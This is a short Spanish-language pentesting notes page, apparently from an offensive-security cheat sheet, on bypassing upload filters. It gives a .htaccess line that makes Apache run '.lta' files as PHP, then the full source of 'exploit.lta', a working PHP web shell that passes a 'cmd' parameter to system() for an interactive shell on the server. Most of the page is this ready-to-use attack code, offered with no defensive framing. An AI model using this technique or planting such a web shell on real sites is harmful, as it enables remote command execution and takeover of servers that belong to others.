rectangle-terminalBypass

Formas de evadir ciertas reglas del objetivo.

Arbitrary Upload File .htaccess

1

Subir un archivo .htaccess

Sube un archivo .htaccess con el siguiente contenido:

AddType application/x-httpd-php .lta

Será interpretado como php.

2

Subir el archivo exploit.lta

Asi como este archivo de ejemplo exploit.lta.

Código de exploit.lta:

exploit.lta
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
3

Resultado

Obteniendo asi una cmd interactiva:

Referencias

Last updated